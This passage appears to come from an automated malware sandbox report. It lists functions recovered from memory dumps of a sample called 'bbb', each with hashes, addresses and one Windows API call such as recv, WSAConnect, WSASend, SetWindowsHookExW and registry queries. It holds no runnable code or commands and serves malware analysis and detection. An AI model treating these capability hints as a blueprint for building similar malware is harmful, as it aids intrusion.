Opcode Fuzzy Hash: b92ce988b0bff02148ed75914da8be7a2855373d6cefc54ccb8c5da3e7d26691
Instruction Fuzzy Hash: 3A116D75604200DFEB20CF55D885B66FBE8EF18610F0888AADD49CB656D374E408CB61

Function 00CBA078 Relevance: 1.6, APIs: 1, Instructions: 54networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(?,?,?,?), ref: 00CBA0D5

Memory Dump Source

Source File: 00000004.00000002.3074534296.0000000000CBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CBA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_cba000_bbb.jbxd

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: f031355c2b85a881fa991be56b3e18295166f6b599807050a8f9212281220fc1
Instruction ID: acb6af18bc4271b7b36c7cf651d84d18856a4a6d0e14e521d0e152ae3a4a45a5
Opcode Fuzzy Hash: f031355c2b85a881fa991be56b3e18295166f6b599807050a8f9212281220fc1
Instruction Fuzzy Hash: 1A11C175409380AFDB22CF15DC44B56FFB4EF4A320F08849EED848B552C275A908CB62

Function 00CBA8BC Relevance: 1.6, APIs: 1, Instructions: 54comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(?), ref: 00CBA918

Memory Dump Source

Source File: 00000004.00000002.3074534296.0000000000CBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CBA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_cba000_bbb.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 58a5dd123eab8fd76b11b1803f7f7058ea9291e5f2633d430cd74246ba78a989
Instruction ID: 2bd4172a6614d216259d100feed70023f7d380a5d1ae4b9c9833f8c0c59d1046
Opcode Fuzzy Hash: 58a5dd123eab8fd76b11b1803f7f7058ea9291e5f2633d430cd74246ba78a989
Instruction Fuzzy Hash: 71118F718083809FDB128F25DC54B96BFB4EF46320F0984DADD858F262D279A908CB62

Function 0593161E Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

RasConnectionNotificationW.RASAPI32(?,00000E24,4D31662F,00000000,00000000,00000000,00000000), ref: 05931677

Memory Dump Source

Source File: 00000004.00000002.3132763480.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5930000_bbb.jbxd

Similarity

API ID: ConnectionNotification
String ID:
API String ID: 1402429939-0
Opcode ID: fc0f8ad7b1cc4c59155fee75c1ecf03946b4864a57743ef1853330f622a919ef
Instruction ID: 7f7c701fcc41592b12cc48b38d3b09122476bed50f756810f9ccd2781ee226e8
Opcode Fuzzy Hash: fc0f8ad7b1cc4c59155fee75c1ecf03946b4864a57743ef1853330f622a919ef
Instruction Fuzzy Hash: BC11E1B5500204AFE7218B42CD85FA6FBA8EF44328F08846AED054B652D374E848CAB6

Function 05931DE2 Relevance: 1.6, APIs: 1, Instructions: 53networkCOMMON

Download Yara Rule

APIs

GetNetworkParams.IPHLPAPI(?,00000E24,4D31662F,00000000,00000000,00000000,00000000), ref: 05931E38

Memory Dump Source

Source File: 00000004.00000002.3132763480.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5930000_bbb.jbxd

Similarity

API ID: NetworkParams
String ID:
API String ID: 2134775280-0
Opcode ID: 3285a529149af292706923f485c0bed71024e21f8c65e44b401a7ca2fee2f09c
Instruction ID: a53ad5a31cb035adf3618eaf982df8fe9f9d18fb163e24ddea06402327523b18
Opcode Fuzzy Hash: 3285a529149af292706923f485c0bed71024e21f8c65e44b401a7ca2fee2f09c
Instruction Fuzzy Hash: 84010075500200AEEB21CF06CC85FAAFBACEF09724F08849AED058B652D375E44CCBB5

Function 00CBBEBA Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32(?,00000E24,4D31662F,00000000,00000000,00000000,00000000), ref: 00CBBF0D

Memory Dump Source

Source File: 00000004.00000002.3074534296.0000000000CBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CBA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_cba000_bbb.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: c54d2a84cb6a7d01056ea2cabd5bbbb7b02dd177bba4f4735052620960c56629
Instruction ID: 7f1e15feb2879767cf9e131ac0ca8ed1ad4d121c285bb71f73e785792b25308d
Opcode Fuzzy Hash: c54d2a84cb6a7d01056ea2cabd5bbbb7b02dd177bba4f4735052620960c56629
Instruction Fuzzy Hash: 9B01C079500200AEE7208B46DD85BFAFBA8DF55724F18809AED058B642D3B4E948CAA5

Function 059359CC Relevance: 1.6, APIs: 1, Instructions: 52windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,?,?,?,?,?,?), ref: 05935A32

Memory Dump Source

Source File: 00000004.00000002.3132763480.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5930000_bbb.jbxd

Similarity

API ID: MessageSendTimeout
String ID:
API String ID: 1599653421-0
Opcode ID: a66b06a21c9b1edce03871cc754bfa7bac2099745dbc1fb24ff687c0fafe3a1f
Instruction ID: 5a33b410743f57b2797be84ece366612a90ea5e083892a05940479d6ae94fe5d
Opcode Fuzzy Hash: a66b06a21c9b1edce03871cc754bfa7bac2099745dbc1fb24ff687c0fafe3a1f
Instruction Fuzzy Hash: 85116D75408780AFCB228F55DC84E62FFF4EF4A320F09889AE9854B562C375A459DB61

Function 0593232E Relevance: 1.5, APIs: 1, Instructions: 49networkCOMMON

Download Yara Rule

APIs

WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 0593237A

Memory Dump Source

Source File: 00000004.00000002.3132763480.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5930000_bbb.jbxd

Similarity

API ID: Connect
String ID:
API String ID: 3144859779-0
Opcode ID: d2851777072192197f77bfabd45d389331c400eec6f6560eed61a8fccef87a0c
Instruction ID: 25dd1652a5b85607137d63ac43093ba21e2d153c646eca182dbf4fdc46a265d6
Opcode Fuzzy Hash: d2851777072192197f77bfabd45d389331c400eec6f6560eed61a8fccef87a0c
Instruction Fuzzy Hash: 38117C75500600DFDF20CF55D885B66FBE9FF08620F0889AAED858B622D375E418CF62

Function 05934142 Relevance: 1.5, APIs: 1, Instructions: 47fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,4D31662F,00000000,?,?,?,?,?,?,?,?,6C9F3C58), ref: 0593417C

Memory Dump Source

Source File: 00000004.00000002.3132763480.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5930000_bbb.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: ada6f1d6fb4aedd0072581219216cf08dcb8abd883c43d9922b07c30e8514c64
Instruction ID: ecb55e2aefa94f642bc2cca60d0a4bd7ffe43524079e0adf5da1b2fda9c18e32
Opcode Fuzzy Hash: ada6f1d6fb4aedd0072581219216cf08dcb8abd883c43d9922b07c30e8514c64
Instruction Fuzzy Hash: 2C019E71A00600CFDB50CF69D989766FBE8EF65220F08C4AADD49CB746D378E404CBA1

Function 05931492 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetVolumeInformationA.KERNEL32(?,00000E24,?,?), ref: 059314E2

Memory Dump Source

Source File: 00000004.00000002.3132763480.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5930000_bbb.jbxd

Similarity

API ID: InformationVolume
String ID:
API String ID: 2039140958-0
Opcode ID: 27c19bacab31d46a8b298cad45a628f893283cd5496038693d23bbe496812275
Instruction ID: 167d4222571f4f13ee2ec725ea3e19c2af97595bac06fb26a75362643c3c001d
Opcode Fuzzy Hash: 27c19bacab31d46a8b298cad45a628f893283cd5496038693d23bbe496812275
Instruction Fuzzy Hash: 4501B171A00200ABD310DF16CD46B76FBE8FB88A20F14811AEC089BB41D735B955CBE1

Function 0593409A Relevance: 1.5, APIs: 1, Instructions: 47networkCOMMON

Download Yara Rule

APIs

WSASend.WS2_32(?,00000E24,?,?), ref: 059340EA

Memory Dump Source

Source File: 00000004.00000002.3132763480.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5930000_bbb.jbxd

Similarity

API ID: Send
String ID:
API String ID: 121738739-0
Opcode ID: 6d15f54664668c5eaa8009c328441f65a7158078c40db330a49b3e9c0becce84
Instruction ID: 7b75bc7fbb3dae77abd490d4e43cb7ac8662a7c52015a586e84e4e31b67176b8
Opcode Fuzzy Hash: 6d15f54664668c5eaa8009c328441f65a7158078c40db330a49b3e9c0becce84
Instruction Fuzzy Hash: 8501B171A00200ABD310DF16CD46B76FBE8FB88A20F14811AED089BB41D735B955CBE1

Function 059328FA Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

K32GetModuleBaseNameW.KERNEL32(?,00000E24,?,?), ref: 0593294A

Memory Dump Source

Source File: 00000004.00000002.3132763480.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5930000_bbb.jbxd

Similarity

API ID: BaseModuleName
String ID:
API String ID: 595626670-0
Opcode ID: 2482b335286f97e66e1bf921d03ce1e87882bcaa739bdc1ab26c2e119b96a456
Instruction ID: b7e0ff2c6d7730e80ba87f7b9e611f0210acfb1e6850ad2aeb894cbf66c7c23c
Opcode Fuzzy Hash: 2482b335286f97e66e1bf921d03ce1e87882bcaa739bdc1ab26c2e119b96a456
Instruction Fuzzy Hash: 25017C71A00200ABD310DF16DD86B76FBE8FB88A20F14856AED089BB41D735B955CBE5

Function 05935F6E Relevance: 1.5, APIs: 1, Instructions: 46libraryCOMMON

Download Yara Rule

APIs

LoadLibraryShim.MSCOREE(?,?,?,?), ref: 05935FB9

Memory Dump Source

Source File: 00000004.00000002.3132763480.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5930000_bbb.jbxd

Similarity

API ID: LibraryLoadShim
String ID:
API String ID: 1475914169-0
Opcode ID: b222552eba66cfe6b060aca7f275e511cc858eba1929f5b050df14117e4bbe5d
Instruction ID: efed5025b01596751fe45a4f6fb20a7d395b07b8e2aa40d0a5a92d34b2dc4cda
Opcode Fuzzy Hash: b222552eba66cfe6b060aca7f275e511cc858eba1929f5b050df14117e4bbe5d
Instruction Fuzzy Hash: FB018C75600200CFEB60CF19D986B26FBE8FF18620F098499DD498B756D374E408CB62

Function 05932D22 Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 05932D66

Memory Dump Source

Source File: 00000004.00000002.3132763480.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5930000_bbb.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: b7d09d296cf8b5bb60bb347aaa63bbf2f021418a1591a47b60c437bd8eff6b38
Instruction ID: eeef24ebb58971b0c0a42352f9488eeae6dae29bb83f9c85f466c383c4f2ec79
Opcode Fuzzy Hash: b7d09d296cf8b5bb60bb347aaa63bbf2f021418a1591a47b60c437bd8eff6b38
Instruction Fuzzy Hash: 4E01AD36900600DFDB21CF55D845B66FBE5FF08320F08889AED498A616C335E418CF61

Function 0593566A Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

SetWindowTextW.USER32(?,?), ref: 059356A7

Memory Dump Source

Source File: 00000004.00000002.3132763480.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5930000_bbb.jbxd

Similarity

API ID: TextWindow
String ID:
API String ID: 530164218-0
Opcode ID: 0e960d3918abe0c3d666ded01818823ebab93ec2e1c16e384625f1e91e43f755
Instruction ID: bb2abe413a060397e252eaac5d7fdf90b01ad346d4f84e44104bbef71e229d4b
Opcode Fuzzy Hash: 0e960d3918abe0c3d666ded01818823ebab93ec2e1c16e384625f1e91e43f755
Instruction Fuzzy Hash: FC01D475600240CFDB20CF15D885B66FBE8EF18224F08C0AADC458B752D374E808CBA2

Function 00CBA772 Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

SetWindowsHookExW.USER32(?,00000E24,?,?), ref: 00CBA7BD

Memory Dump Source

Source File: 00000004.00000002.3074534296.0000000000CBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CBA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_cba000_bbb.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 33e365d8cb71beb93e63418525a71a4e11b499ad6f690edef8bfca6bfb5658d2
Instruction ID: 097a502af33243f4b0e9d23598d1bd9bba865d6a93c7cd72049c946b13d24465
Opcode Fuzzy Hash: 33e365d8cb71beb93e63418525a71a4e11b499ad6f690edef8bfca6bfb5658d2
Instruction Fuzzy Hash: 3D01A271500200ABD310DF16CD46B66FBE8FB88A20F14811AEC089BB41D731F959CBE5

Function 05930542 Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

setsockopt.WS2_32(?,?,?,?,?), ref: 05930580

Memory Dump Source

Source File: 00000004.00000002.3132763480.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5930000_bbb.jbxd

Similarity

API ID: setsockopt
String ID:
API String ID: 3981526788-0
Opcode ID: e4947462219d781122b2ee21284f90730f80c08236fea79bad2082c1de15715f
Instruction ID: 621f94d3af7da68e091fdcb7a51a06f93cc76e71e97919af53c7825e09046eb4
Opcode Fuzzy Hash: e4947462219d781122b2ee21284f90730f80c08236fea79bad2082c1de15715f
Instruction Fuzzy Hash: 90019271500200DFDB20CF55D845B65FBE5FF58320F08889ADD454B616C375E418CFA1

Function 0593037E Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

RasEnumConnectionsW.RASAPI32(?,00000E24,?,?), ref: 059303CE

Memory Dump Source

Source File: 00000004.00000002.3132763480.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5930000_bbb.jbxd

Similarity

API ID: ConnectionsEnum
String ID:
API String ID: 3832085198-0
Opcode ID: 183711e3b12e9b985a0dac43dcf0847afae782787c45b5379f49fd5a7abed4ac
Instruction ID: 3eb6441efbe92220971a970602cba1ff20b1a6580e258be8f8c7d3b923c8eb25
Opcode Fuzzy Hash: 183711e3b12e9b985a0dac43dcf0847afae782787c45b5379f49fd5a7abed4ac
Instruction Fuzzy Hash: D501A271500200ABD310DF16CD46B66FBE8FB88A20F14811AED089BB41D731F955CBE5

Function 059302AA Relevance: 1.5, APIs: 1, Instructions: 43registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E24,?,?), ref: 059302FA

Memory Dump Source

Source File: 00000004.00000002.3132763480.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5930000_bbb.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: d256b5bc346af73e860528bea9d882481b35dfe09a81c0ce71db111205acf206
Instruction ID: 02e0bb00d78c49907a3471e732f9fc41bd229e5cd2e5ef0a8f7520e075b17c39
Opcode Fuzzy Hash: d256b5bc346af73e860528bea9d882481b35dfe09a81c0ce71db111205acf206
Instruction Fuzzy Hash: 7701A271500200ABD310DF16CD46B66FBE8FB88A20F14811AEC089BB41D771F955CBE5

Function 05934C5E Relevance: 1.5, APIs: 1, Instructions: 43registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.KERNEL32(?,00000E24,?,?), ref: 05934CAE

Memory Dump Source

Source File: 00000004.00000002.3132763480.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5930000_bbb.jbxd

Similarity

API ID: Enum
String ID:
API String ID: 2928410991-0
Opcode ID: 127bf565cb2c44336197bd63831b6bdcd0030aee35fb4cef68c9484f7a8a2487
Instruction ID: ad88f9c0990bcd86b087f0472636058789b4853529142e14dab2303d436e3088
Opcode Fuzzy Hash: 127bf565cb2c44336197bd63831b6bdcd0030aee35fb4cef68c9484f7a8a2487
Instruction Fuzzy Hash: 4501A271500200ABD310DF16CD46B66FBE8FB88A20F14811AEC089BB41D731F959CBE5

Function 05935AA2 Relevance: 1.5, APIs: 1, Instructions: 42windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 05935ADD

Memory Dump Source

Source File: 00000004.00000002.3132763480.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5930000_bbb.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 07975bc6fe1b02a26c362a462875ce449673648f9ebe3bedddafa5b3a174a46e
Instruction ID: 10f6fc33bff867e036ffa82c59c8bd4d5c41cec51b7a9c2e34d3bd3895db2bed
Opcode Fuzzy Hash: 07975bc6fe1b02a26c362a462875ce449673648f9ebe3bedddafa5b3a174a46e
Instruction Fuzzy Hash: AD01B175500600CFDB208F15D885B66FBE8EF19220F08C49EDD468B652C375E418DFA1

Function 059359EE Relevance: 1.5, APIs: 1, Instructions: 41windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,?,?,?,?,?,?), ref: 05935A32

Memory Dump Source

Source File: 00000004.00000002.3132763480.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5930000_bbb.jbxd

Similarity

API ID: MessageSendTimeout
String ID:
API String ID: 1599653421-0
Opcode ID: 0ccda94edda79af9de2780f04936d8b805a1dcd8b70a364e7ad83f643f8b5c58
Instruction ID: 81e30df41ba6e1dab1aa61371174de53467fef5a29f32aa37cc3fc8de009a91f
Opcode Fuzzy Hash: 0ccda94edda79af9de2780f04936d8b805a1dcd8b70a364e7ad83f643f8b5c58
Instruction Fuzzy Hash: 9F019E76400640DFDB218F45D985B66FBE5FF18320F088899DE864A622C376E418EFA2

Function 00CBA8E6 Relevance: 1.5, APIs: 1, Instructions: 39comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(?), ref: 00CBA918

Memory Dump Source

Source File: 00000004.00000002.3074534296.0000000000CBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CBA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_cba000_bbb.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: c7b1e05b5f2d55a6c18100e75f8a187b55a29a893c794ff7034965350b828d13
Instruction ID: e722bed062f450d464887fc58cf9f8f75ca73424587a97bf659df80e03d77557
Opcode Fuzzy Hash: c7b1e05b5f2d55a6c18100e75f8a187b55a29a893c794ff7034965350b828d13
Instruction Fuzzy Hash: 5801D1759002409FDB20CF15D9847A6FBE4EF55320F08C4AADD898F746D379E908DBA2

Function 0593655A Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?,4D31662F,00000000,?,?,?,?,?,?,?,?,6C9F3C58), ref: 0593658C

Memory Dump Source

Source File: 00000004.00000002.3132763480.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5930000_bbb.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: b7a552644c158b757dee1a515d5d8ddac159df4099f73d92631dfe1ae31e1a3d
Instruction ID: 028969e59038f23e8fcb92d25ecbf40c33af696519671a92427d083820b9d337
Opcode Fuzzy Hash: b7a552644c158b757dee1a515d5d8ddac159df4099f73d92631dfe1ae31e1a3d
Instruction Fuzzy Hash: 4401AD75900244EFDB10CF15D985B65FBE4EF55220F08C4AADD498F74AD379E408CBA2

Function 059341F6 Relevance: 1.5, APIs: 1, Instructions: 38windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 05934231

Memory Dump Source

Source File: 00000004.00000002.3132763480.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5930000_bbb.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 0f327fb81b92c650940066813538e7cbab8234669f96b54b4b78eff0666d5178
Instruction ID: 8a79859cf7d3414384e1b1a0bf72fcb8a4b95b3da691202b05fbea4c6e8c860f
Opcode Fuzzy Hash: 0f327fb81b92c650940066813538e7cbab8234669f96b54b4b78eff0666d5178
Instruction Fuzzy Hash: B1018676900200DFDB20CF45D889B66FBE4FF59320F08C49AEE590B662D375E458CBA2

Function 059358BA Relevance: 1.5, APIs: 1, Instructions: 38windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,?,?,?), ref: 059358F5

Memory Dump Source

Source File: 00000004.00000002.3132763480.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5930000_bbb.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 92896b3a35f4abf3636a777df7d94e75cad338dadf3d3fe1dfef5e4a82b1374e
Instruction ID: 2a6e174987ae787c1fef01fe285c183d58e2bf841432b3794d66e55a0eacb144
Opcode Fuzzy Hash: 92896b3a35f4abf3636a777df7d94e75cad338dadf3d3fe1dfef5e4a82b1374e
Instruction Fuzzy Hash: 72018B75500244DFDB60CF45D885B65FBE4FF18220F08C49ADD494B652D375E418DFA2

Function 00CBA2DA Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(?,4D31662F,00000000,?,?,?,?,?,?,?,?,6C9F3C58), ref: 00CBA30C

Memory Dump Source

Source File: 00000004.00000002.3074534296.0000000000CBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CBA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_cba000_bbb.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 766987561f295dd50ee3697c102a349f49ef5bf3aa220b18614a1745c5b28998
Instruction ID: 858febb5ab8090a63faf4ed9b356f4fb9839de417b77dd7b917d4a40b4154dc1
Opcode Fuzzy Hash: 766987561f295dd50ee3697c102a349f49ef5bf3aa220b18614a1745c5b28998
Instruction Fuzzy Hash: 59F0AF75904240CFDB208F06D8847A6FBE4EF15720F08C09ADD494B766D379E948CAA2

Function 05935526 Relevance: 1.5, APIs: 1, Instructions: 35windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32(?), ref: 05935558

Memory Dump Source

Source File: 00000004.00000002.3132763480.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5930000_bbb.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: dd1f6ac9c927bc2e32d8446a906098787de29ab437cef8494508e578f612c9a2
Instruction ID: eb761a2680f1c43882a3e2af68c3d550e91f90f6c3d7817e125940edcf3d2655
Opcode Fuzzy Hash: dd1f6ac9c927bc2e32d8446a906098787de29ab437cef8494508e578f612c9a2
Instruction Fuzzy Hash: 3EF0AF75900240CFDB20CF05D885B65FBE5EF19220F08C49ADD0A4B752D379E808CFA2

Function 05902AA2 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3132690123.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5900000_bbb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c272a37370aa294c98ba9f4f46be993de7c7cfc1c446a2aafa928c627a49246
Instruction ID: e3c81347635a151b361df51d4c26ee77e3aad3332da9ce2ad605ce1487078f5f
Opcode Fuzzy Hash: 4c272a37370aa294c98ba9f4f46be993de7c7cfc1c446a2aafa928c627a49246
Instruction Fuzzy Hash: 7021E7B5608341AFD340CF19D840A5BBBE4EB89660F04896EF99897311D234E9088BA2

Function 05903514 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3132690123.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5900000_bbb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 000a36473e9166bbba98a4719fb2c048fd7a9e4897ed6e781e57d64653637f8b
Instruction ID: ec35fa17f67d3b80399da6436c08ff8f4433a12dccb1d1ca8ca77f47fc81b349
Opcode Fuzzy Hash: 000a36473e9166bbba98a4719fb2c048fd7a9e4897ed6e781e57d64653637f8b
Instruction Fuzzy Hash: 7411B6B5908341AFD350CF19D880A5BFBE4FB98664F04896EF99897311D235E9088FA2

Function 00AA12DC Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3071921012.0000000000AA0000.00000040.00000020.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_aa0000_bbb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20cd7eebb4b83a179ce69b508403597a652c904f8f3f497bbf7f0781c4bad095
Instruction ID: bfe94920f3f3dc5d6a19c1562e66509918ba5f4ce449d4871291c6db05731f61
Opcode Fuzzy Hash: 20cd7eebb4b83a179ce69b508403597a652c904f8f3f497bbf7f0781c4bad095
Instruction Fuzzy Hash: C611D634204284EFC755CF10C540B66FBE5EB9A718F28C9ACE4494BB92C777D807DA51

Function 00AA12BB Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3071921012.0000000000AA0000.00000040.00000020.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_aa0000_bbb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8827580d0dfb9b15e34b38c998fbf3ff663f1cbd891efc17104b626ff4ff75aa
Instruction ID: bcdb23bf46de70c4f3782fc5de337a32a3c74fc2fa648684f83aa92ad516af07
Opcode Fuzzy Hash: 8827580d0dfb9b15e34b38c998fbf3ff663f1cbd891efc17104b626ff4ff75aa
Instruction Fuzzy Hash: 62112B345493C49FCB13CB20C990B15BFB1AB47714F1986EED4898FAA3D33A8806DB52

Function 00AA05DF Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3071921012.0000000000AA0000.00000040.00000020.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_aa0000_bbb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2222d1925f10735be27cddd00dae2497e28db09c00077acd63d208acebd2042
Instruction ID: 9b628caa91ad906c700ca9212a000161a2ffd94f7020e6f0c25be766e3f7491f
Opcode Fuzzy Hash: a2222d1925f10735be27cddd00dae2497e28db09c00077acd63d208acebd2042
Instruction Fuzzy Hash: 84F086B65083845FD7118F15AC45862FFECEF85670B09C49FEC498B651D279B908CBA2

Function 00AA1398 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3071921012.0000000000AA0000.00000040.00000020.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_aa0000_bbb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3c181a57d58872c77186dea16c7b84c2b348ca3ffffdec1f3d2b946b90fd649
Instruction ID: 851584249859dc2f98b449768b377acd9da49b4ed8c7bfef21a7c6bcf3a82afb
Opcode Fuzzy Hash: a3c181a57d58872c77186dea16c7b84c2b348ca3ffffdec1f3d2b946b90fd649
Instruction Fuzzy Hash: 94F0CD35148644DFC715CF40D540B16FBA2FB89718F24CAADE9491BB52C737D813DA91

Function 00AA0606 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3071921012.0000000000AA0000.00000040.00000020.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false

Joe Sandbox IDA Plugin

